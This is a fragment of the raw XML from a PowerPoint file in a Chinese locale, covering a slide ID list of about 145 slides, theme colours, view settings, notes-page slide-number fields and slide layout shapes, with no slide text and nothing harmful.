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6"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="851" r:id="rId2"/>
    <p:sldId id="802" r:id="rId3"/>
    <p:sldId id="806" r:id="rId4"/>
    <p:sldId id="853" r:id="rId5"/>
    <p:sldId id="854" r:id="rId6"/>
    <p:sldId id="855" r:id="rId7"/>
    <p:sldId id="856" r:id="rId8"/>
    <p:sldId id="857" r:id="rId9"/>
    <p:sldId id="858" r:id="rId10"/>
    <p:sldId id="859" r:id="rId11"/>
    <p:sldId id="860" r:id="rId12"/>
    <p:sldId id="886" r:id="rId13"/>
    <p:sldId id="861" r:id="rId14"/>
    <p:sldId id="862" r:id="rId15"/>
    <p:sldId id="863" r:id="rId16"/>
    <p:sldId id="864" r:id="rId17"/>
    <p:sldId id="865" r:id="rId18"/>
    <p:sldId id="866" r:id="rId19"/>
    <p:sldId id="867" r:id="rId20"/>
    <p:sldId id="868" r:id="rId21"/>
    <p:sldId id="869" r:id="rId22"/>
    <p:sldId id="870" r:id="rId23"/>
    <p:sldId id="871" r:id="rId24"/>
    <p:sldId id="872" r:id="rId25"/>
    <p:sldId id="873" r:id="rId26"/>
    <p:sldId id="874" r:id="rId27"/>
    <p:sldId id="875" r:id="rId28"/>
    <p:sldId id="876" r:id="rId29"/>
    <p:sldId id="877" r:id="rId30"/>
    <p:sldId id="878" r:id="rId31"/>
    <p:sldId id="879" r:id="rId32"/>
    <p:sldId id="880" r:id="rId33"/>
    <p:sldId id="881" r:id="rId34"/>
    <p:sldId id="882" r:id="rId35"/>
    <p:sldId id="883" r:id="rId36"/>
    <p:sldId id="884" r:id="rId37"/>
    <p:sldId id="887" r:id="rId38"/>
    <p:sldId id="885" r:id="rId39"/>
    <p:sldId id="888" r:id="rId40"/>
    <p:sldId id="889" r:id="rId41"/>
    <p:sldId id="890" r:id="rId42"/>
    <p:sldId id="891" r:id="rId43"/>
    <p:sldId id="892" r:id="rId44"/>
    <p:sldId id="893" r:id="rId45"/>
    <p:sldId id="894" r:id="rId46"/>
    <p:sldId id="897" r:id="rId47"/>
    <p:sldId id="898" r:id="rId48"/>
    <p:sldId id="899" r:id="rId49"/>
    <p:sldId id="900" r:id="rId50"/>
    <p:sldId id="901" r:id="rId51"/>
    <p:sldId id="902" r:id="rId52"/>
    <p:sldId id="896" r:id="rId53"/>
    <p:sldId id="904" r:id="rId54"/>
    <p:sldId id="905" r:id="rId55"/>
    <p:sldId id="906" r:id="rId56"/>
    <p:sldId id="907" r:id="rId57"/>
    <p:sldId id="908" r:id="rId58"/>
    <p:sldId id="909" r:id="rId59"/>
    <p:sldId id="910" r:id="rId60"/>
    <p:sldId id="911" r:id="rId61"/>
    <p:sldId id="912" r:id="rId62"/>
    <p:sldId id="913" r:id="rId63"/>
    <p:sldId id="914" r:id="rId64"/>
    <p:sldId id="915" r:id="rId65"/>
    <p:sldId id="916" r:id="rId66"/>
    <p:sldId id="917" r:id="rId67"/>
    <p:sldId id="903" r:id="rId68"/>
    <p:sldId id="918" r:id="rId69"/>
    <p:sldId id="920" r:id="rId70"/>
    <p:sldId id="921" r:id="rId71"/>
    <p:sldId id="922" r:id="rId72"/>
    <p:sldId id="923" r:id="rId73"/>
    <p:sldId id="924" r:id="rId74"/>
    <p:sldId id="925" r:id="rId75"/>
    <p:sldId id="926" r:id="rId76"/>
    <p:sldId id="927" r:id="rId77"/>
    <p:sldId id="929" r:id="rId78"/>
    <p:sldId id="930" r:id="rId79"/>
    <p:sldId id="931" r:id="rId80"/>
    <p:sldId id="932" r:id="rId81"/>
    <p:sldId id="933" r:id="rId82"/>
    <p:sldId id="934" r:id="rId83"/>
    <p:sldId id="935" r:id="rId84"/>
    <p:sldId id="928" r:id="rId85"/>
    <p:sldId id="936" r:id="rId86"/>
    <p:sldId id="937" r:id="rId87"/>
    <p:sldId id="938" r:id="rId88"/>
    <p:sldId id="939" r:id="rId89"/>
    <p:sldId id="940" r:id="rId90"/>
    <p:sldId id="941" r:id="rId91"/>
    <p:sldId id="942" r:id="rId92"/>
    <p:sldId id="944" r:id="rId93"/>
    <p:sldId id="943" r:id="rId94"/>
    <p:sldId id="970" r:id="rId95"/>
    <p:sldId id="971" r:id="rId96"/>
    <p:sldId id="972" r:id="rId97"/>
    <p:sldId id="973" r:id="rId98"/>
    <p:sldId id="974" r:id="rId99"/>
    <p:sldId id="975" r:id="rId100"/>
    <p:sldId id="976" r:id="rId101"/>
    <p:sldId id="977" r:id="rId102"/>
    <p:sldId id="978" r:id="rId103"/>
    <p:sldId id="979" r:id="rId104"/>
    <p:sldId id="980" r:id="rId105"/>
    <p:sldId id="919" r:id="rId106"/>
    <p:sldId id="982" r:id="rId107"/>
    <p:sldId id="983" r:id="rId108"/>
    <p:sldId id="984" r:id="rId109"/>
    <p:sldId id="985" r:id="rId110"/>
    <p:sldId id="986" r:id="rId111"/>
    <p:sldId id="987" r:id="rId112"/>
    <p:sldId id="988" r:id="rId113"/>
    <p:sldId id="989" r:id="rId114"/>
    <p:sldId id="990" r:id="rId115"/>
    <p:sldId id="992" r:id="rId116"/>
    <p:sldId id="993" r:id="rId117"/>
    <p:sldId id="994" r:id="rId118"/>
    <p:sldId id="995" r:id="rId119"/>
    <p:sldId id="996" r:id="rId120"/>
    <p:sldId id="997" r:id="rId121"/>
    <p:sldId id="998" r:id="rId122"/>
    <p:sldId id="999" r:id="rId123"/>
    <p:sldId id="1000" r:id="rId124"/>
    <p:sldId id="1001" r:id="rId125"/>
    <p:sldId id="981" r:id="rId126"/>
    <p:sldId id="1003" r:id="rId127"/>
    <p:sldId id="1004" r:id="rId128"/>
    <p:sldId id="1005" r:id="rId129"/>
    <p:sldId id="1006" r:id="rId130"/>
    <p:sldId id="1007" r:id="rId131"/>
    <p:sldId id="1008" r:id="rId132"/>
    <p:sldId id="1009" r:id="rId133"/>
    <p:sldId id="1010" r:id="rId134"/>
    <p:sldId id="1011" r:id="rId135"/>
    <p:sldId id="1012" r:id="rId136"/>
    <p:sldId id="1014" r:id="rId137"/>
    <p:sldId id="1015" r:id="rId138"/>
    <p:sldId id="1016" r:id="rId139"/>
    <p:sldId id="1017" r:id="rId140"/>
    <p:sldId id="1018" r:id="rId141"/>
    <p:sldId id="1019" r:id="rId142"/>
    <p:sldId id="1002" r:id="rId143"/>
    <p:sldId id="1013" r:id="rId144"/>
    <p:sldId id="852" r:id="rId14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466"/>
    <a:srgbClr val="A6A6A6"/>
    <a:srgbClr val="E76668"/>
    <a:srgbClr val="FAC55C"/>
    <a:srgbClr val="67BFBE"/>
    <a:srgbClr val="E24246"/>
    <a:srgbClr val="3A8E8C"/>
    <a:srgbClr val="46AAA8"/>
    <a:srgbClr val="C37E0D"/>
    <a:srgbClr val="F09E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424" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="167" d="100"/>
          <a:sy n="167" d="100"/>
        </p:scale>
        <p:origin x="360" y="115"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1620"/>
        <p:guide pos="2857"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="25" d="100"/>
        <a:sy n="25" d="100"/>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heme" Target="theme/theme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D96D07-341D-4D88-BBFE-B431BFA04196}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2022/4/7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2A0F9D-3357-4A94-85C8-3B842B870DC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a:t>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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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100</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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101</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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102</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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103</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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104</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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105</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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106</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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107</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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108</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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109</a:t>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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110</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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111</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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112</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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113</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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114</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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115</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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116</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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117</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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118</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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119</a:t>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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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120</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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121</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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122</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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123</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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124</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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125</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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126</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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127</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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128</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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129</a:t>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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130</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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131</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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132</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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133</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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134</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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135</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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136</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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137</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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138</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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139</a:t>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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140</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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141</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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142</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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143</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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144</a:t>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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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16</a:t>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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19</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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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29</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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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39</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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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49</a:t>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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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52</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">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53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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55</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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58</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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59</a:t>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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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60</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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61</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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63</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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64</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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65</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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66</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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67</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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68</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>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69</a:t>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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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70</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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71</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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72</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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73</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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74</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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75</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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76</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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77</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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78</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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79</a:t>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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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80</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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81</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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82</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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83</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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84</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFil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85</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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86</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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87</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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88</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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89</a:t>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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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90</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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91</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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92</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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93</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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94</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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95</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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96</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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97</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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98</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>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99</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stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354" y="8255"/>
            <a:ext cx="9141291" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8106687" y="4874608"/>
            <a:ext cx="785793" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第 </a:t>
            </a:r>
            <a:fld id="{15E71900-10A2-4CC6-8A82-1659C4480C15}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 页</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="0"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-132080" y="-49530"/>
            <a:ext cx="1357630" cy="9798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stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1354" y="0"/>
            <a:ext cx="9141291"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 name="图片 1" descr="TIM图片20181107103509"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2540" y="-3175"/>
            <a:ext cx="9140190" cy="251015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2.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NULL" TargetMode="Externa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3970"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EDEDEB"/>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3" name="直角三角形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3682219" y="0"/>
            <a:ext cx="5461781" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle">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斜纹 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5591908" y="0"/>
            <a:ext cx="2877178" cy="2700997"/>
          </a:xfrm>
          <a:prstGeom prst="diagStripe">
            <a:avLst>
              <a:gd name="adj" fmla="val 46235"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId3" cstate="print"/>
            <a:tile algn="t"/>
          </a:blip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 name="斜纹 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973774" y="0"/>
            <a:ext cx="990623" cy="929963"/>
          </a:xfrm>
          <a:prstGeom prst="diagStripe">
            <a:avLst>
              <a:gd name="adj" fmla="val 75545"/>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 name="任意多边形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013425" y="4437039"/>
